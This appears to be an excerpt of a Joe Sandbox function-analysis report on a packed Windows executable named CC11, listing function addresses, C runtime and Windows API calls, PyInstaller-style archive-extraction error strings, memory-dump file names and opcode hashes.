Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction Fuzzy Hash: 87F0C222A19682D6F7B08B70B4997667390EB8472CF440335EA6D427D8DF7CE059CB04

Function 00007FF6900118F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6900176A0: _fread_nolock.LIBCMT ref: 00007FF69001774A

_fread_nolock.LIBCMT ref: 00007FF6900119B4

Part of subcall function 00007FF690012760: MessageBoxW.USER32 ref: 00007FF69001283B

Strings

MEI, xrefs: 00007FF690011931
Could not allocate buffer for TOC!, xrefs: 00007FF690011AA1
Could not read full TOC!, xrefs: 00007FF690011AD4
fread, xrefs: 00007FF6900119C6, 00007FF690011ADB
fseek, xrefs: 00007FF690011990
Failed to seek to cookie position!, xrefs: 00007FF690011989
Error on file., xrefs: 00007FF690011B0A
Failed to read cookie!, xrefs: 00007FF6900119BF
calloc, xrefs: 00007FF6900119F5
Could not allocate memory for archive structure!, xrefs: 00007FF6900119EE
malloc, xrefs: 00007FF690011AA8

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 677216364-3497178890
Opcode ID: a27dc96f3f40e16025b7625df32cfd20e1a462d4ad55a2163b77310ea4cebe2b
Instruction ID: c6ec25d58129f3898a73b6695eec0cc0cbdd8efc9c084f79fb128f5bd52e115b
Opcode Fuzzy Hash: a27dc96f3f40e16025b7625df32cfd20e1a462d4ad55a2163b77310ea4cebe2b
Instruction Fuzzy Hash: 92719231A0CA86A5EBB5CB34E4906F923A5EF4878CF444075EA8DC779DEF2CE5458B00

Function 00007FF690011440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fread, xrefs: 00007FF6900115A1
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF69001159A
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6900114D9
fseek, xrefs: 00007FF6900114B0
Failed to extract %s: failed to open archive file!, xrefs: 00007FF69001146F
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6900114A9
malloc, xrefs: 00007FF6900114E0

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 616ccb320428bfd7ccd31a6d912a45ac58eb3228c4087a80d9a29d8c37b4bf13
Instruction ID: 4b6a3f4181b1ff05e52e113272ff9a4d96ae6244df6e8967a3e72cd431b6587c
Opcode Fuzzy Hash: 616ccb320428bfd7ccd31a6d912a45ac58eb3228c4087a80d9a29d8c37b4bf13
Instruction Fuzzy Hash: 5B419221B08A43A2EB759B35A4405FA63A5FF48BDCF544071EE4D87B9DEE3CE5418700

Function 00007FF6900111F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1.3.1, xrefs: 00007FF690011229
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6900112C3
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6900113EE
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF690011256
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF690011295
malloc, xrefs: 00007FF69001129C, 00007FF6900112CA

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-2813020118
Opcode ID: 0e4779326873ee70208ac24b63761cec5818e5f3cb7e6fbce8df478625f812e2
Instruction ID: b8229354cb737035eb547da92c6e0298408ba426b6b28c7a675c58376e249db5
Opcode Fuzzy Hash: 0e4779326873ee70208ac24b63761cec5818e5f3cb7e6fbce8df478625f812e2
Instruction Fuzzy Hash: 5651C122A08A42A1EAB59B36A4403FA6295FF8479CF444175EE5DC7BDDEF3CE542C700

Function 00007FF69002E020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF69002E3BA,?,?,-00000018,00007FF69002A063,?,?,?,00007FF690029F5A,?,?,?,00007FF69002524E), ref: 00007FF69002E19C
GetProcAddress.KERNEL32(?,?,?,00007FF69002E3BA,?,?,-00000018,00007FF69002A063,?,?,?,00007FF690029F5A,?,?,?,00007FF69002524E), ref: 00007FF69002E1A8

Strings

api-ms-, xrefs: 00007FF69002E0E6
ext-ms-, xrefs: 00007FF69002E0F9

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction ID: d0defe813a72f8529ad1aa1cff3ddcf350b369db17ed7d5ce06ddcad7963068c
Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction Fuzzy Hash: 4C41D131B19A42A1FA36CB3AA8006752796FF49BA0F484175EE1DC778CEE7CE4568300

Function 00007FF69002AD6C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69002B199

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
Instruction ID: e005b9805fc87ec86fd2092fc43cee55ef3e6e0f752feecedb6fa5bcf92668ee
Opcode Fuzzy Hash: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
Instruction Fuzzy Hash: 56C1C122A0C787A2EB719B3994502BE3792FF91B80F5541B1EA5D83799DE7CE856C300

Function 00007FF6900133E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF690013534), ref: 00007FF690013411

Part of subcall function 00007FF6900129E0: GetLastError.KERNEL32(?,?,?,00007FF69001342E,?,00007FF690013534), ref: 00007FF690012A14
Part of subcall function 00007FF6900129E0: FormatMessageW.KERNEL32(?,?,?,00007FF69001342E), ref: 00007FF690012A7D
Part of subcall function 00007FF6900129E0: MessageBoxW.USER32 ref: 00007FF690012ACF

Strings

\\?\, xrefs: 00007FF690013482
Failed to obtain executable path., xrefs: 00007FF69001341B
GetModuleFileNameW, xrefs: 00007FF690013422
Failed to resolve full path to executable %ls., xrefs: 00007FF690013461
Failed to convert executable path to UTF-8., xrefs: 00007FF6900134B8

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message$ErrorFileFormatLastModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 517058245-2863816727
Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction ID: f7e988efd3d34d4d1c3567dfdcaba566f27d1ad52ae0487ec60254b3518fd80e
Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction Fuzzy Hash: DE218121B0C542B1FAB19B34E8417BA2251FF49388F8001B2D69DC77DEEF2CE5048700

Function 00007FF69002EC9C Relevance: 6.2, APIs: 4, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF69002ED8C
_get_daylight.LIBCMT ref: 00007FF69002ED9D
_get_daylight.LIBCMT ref: 00007FF69002EDAE
_isindst.LIBCMT ref: 00007FF69002EE79

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
Instruction ID: 2e7cce899ec9c28307700aad553fb8b2b20012a66b2451346123962cc9cc4e1b
Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
Instruction Fuzzy Hash: 4851F372F04251AAEF38DF7899456BC2BA1EB14358F110179DE1E92BE9DF38E4038700

Function 00007FF8B8316110 Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

__security_init_cookie.LIBCMT ref: 00007FF8B8316138
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF8B831616F
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF8B83161C1

Memory Dump Source

Source File: 00000010.00000002.2270007702.00007FF8B8301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B8300000, based on PE: true

Associated: 00000010.00000002.2269966833.00007FF8B8300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000010.00000002.2270141203.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000010.00000002.2270202656.00007FF8B83EF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000010.00000002.2270256702.00007FF8B83F2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8b8300000_CC11.jbxd

Similarity

API ID: ErrorLast$__security_init_cookie
String ID:
API String ID: 2222513578-0
Opcode ID: 51a1c68c6362424b61c1acff22cfa8e2821de0ade73df4afb968f174aaff75c0
Instruction ID: c2ca61d711092ae3e39f99b9fd34e8f8a558f289c1622a4ab68342770e3c2706
Opcode Fuzzy Hash: 51a1c68c6362424b61c1acff22cfa8e2821de0ade73df4afb968f174aaff75c0
Instruction Fuzzy Hash: 12515D20E0C64342FA9977EDD95517A51919F4DBE0F1C4638DB2E06AD7EF2DB8838708

Function 00007FF690024A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF690024ABF
GetFileInformationByHandle.KERNELBASE ref: 00007FF690024B21
GetLastError.KERNEL32 ref: 00007FF690024BB2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6900249C4), ref: 00007FF690024BFE

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
Instruction ID: fb750d108c2623292a4c426ac6b03a416b45b62ce3830a6e35d10ef0c1786b25
Opcode Fuzzy Hash: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
Instruction Fuzzy Hash: 6C517822E086419AFB64CF79D4503BD27A5EF48B98F218575DE0D8BB8DDF38D4828740

Function 00007FF690024938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF690024965
CreateFileW.KERNELBASE ref: 00007FF6900249A4
CloseHandle.KERNEL32 ref: 00007FF6900249D9

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
Instruction ID: 5952a005980c72c4a21ec1451ba1c3bac91e2bfcf69d06d4c8f20f9078bd3e6a
Opcode Fuzzy Hash: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
Instruction Fuzzy Hash: F6418E22E1878293E7648B7495103696260FFA47A4F109375EB9C83BDDEF7CE5E28700

Function 00007FF69001BF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF69001C12C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF69001C140

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF69001BF80
__scrt_release_startup_lock.LIBCMT ref: 00007FF69001BFEE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF69001C041

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction ID: afe7b2b988735ebbddd38d3ccec8b90aff9a20e253ad8cfb1447db602f92aaf3
Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction Fuzzy Hash: 9C315E25E0D643A2FAB5A7789492BB91381EF4938CF4440B8EA0DC73DFDE2CE8458205

Function 00007FF690028D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF690028D44), ref: 00007FF690028D59
TerminateProcess.KERNEL32(?,?,?,00007FF690028D44), ref: 00007FF690028D64
ExitProcess.KERNEL32 ref: 00007FF690028D73

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
Instruction ID: d569a1b56b959919e4391b4fe92eda8a593df69a1d37d3985b962fd582458feb
Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
Instruction Fuzzy Hash: 17D05E18F19606A3FB382B705C5A5790352DF9C704F0018B8E94F863DBCD2CE80E4300

Function 00007FF8B8316FD0 Relevance: 3.8, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF8B8316FF7
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF8B831703C
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF8B831708E

Memory Dump Source

Source File: 00000010.00000002.2270007702.00007FF8B8301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B8300000, based on PE: true

Associated: 00000010.00000002.2269966833.00007FF8B8300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000010.00000002.2270141203.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000010.00000002.2270202656.00007FF8B83EF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000010.00000002.2270256702.00007FF8B83F2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8b8300000_CC11.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 6b4fdf962c8d231f1478f013950a70e71442974e5fb203732b388d25e7008839
Instruction ID: dccc5a93fb1edc8eaea0c3a3a5aa49b2732faf5f99b8b8419e6084982f1ec758
Opcode Fuzzy Hash: 6b4fdf962c8d231f1478f013950a70e71442974e5fb203732b388d25e7008839
Instruction Fuzzy Hash: 3A215020F0D64382FA59B77D99511BA51515F4CFE0F1C0634E72E066EAEF2EB8435318

Function 00007FF69001F45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69001F4A0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF69001F597

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
Instruction ID: af25e8a45fb27d1b27e653e50c6fae9c672740ecd08210c6cc40224cfedb9dac
Opcode Fuzzy Hash: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
Instruction Fuzzy Hash: A7517461B0968266E7B89E3A940067A6691FF84BBCF144774DE6D877DDCF3CF4418600

Function 00007FF69002B444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF69002B5DD), ref: 00007FF69002B490
GetLastError.KERNEL32(?,?,?,?,?,00007FF69002B5DD), ref: 00007FF69002B49A

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction ID: eac446635ce7575b9d37d0f62653966e237ec8f5716fa4cd681da9f2521c5fe8
Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction Fuzzy Hash: 6111C161A08A8191DA209B39A844169A362FB44BF4F540371EEBD877EECF3CD1518700

Function 00007FF690024C34 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF690024B49), ref: 00007FF690024C67
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF690024B49), ref: 00007FF690024C7D

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
Instruction ID: 13ba63943fcf9e17d1b92c61686373566194ba48e69e3395ed4554d966dabd6f
Opcode Fuzzy Hash: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
Instruction Fuzzy Hash: CA11913160C65291EBB48B29A44103EB7A1FF85765F600276FAADC1BDCEF2CD055DB00

Function 00007FF690029E68 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF690029CE5,?,?,00000000,00007FF690029D9A), ref: 00007FF690029ED6
GetLastError.KERNEL32(?,?,?,00007FF690029CE5,?,?,00000000,00007FF690029D9A), ref: 00007FF690029EE0

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
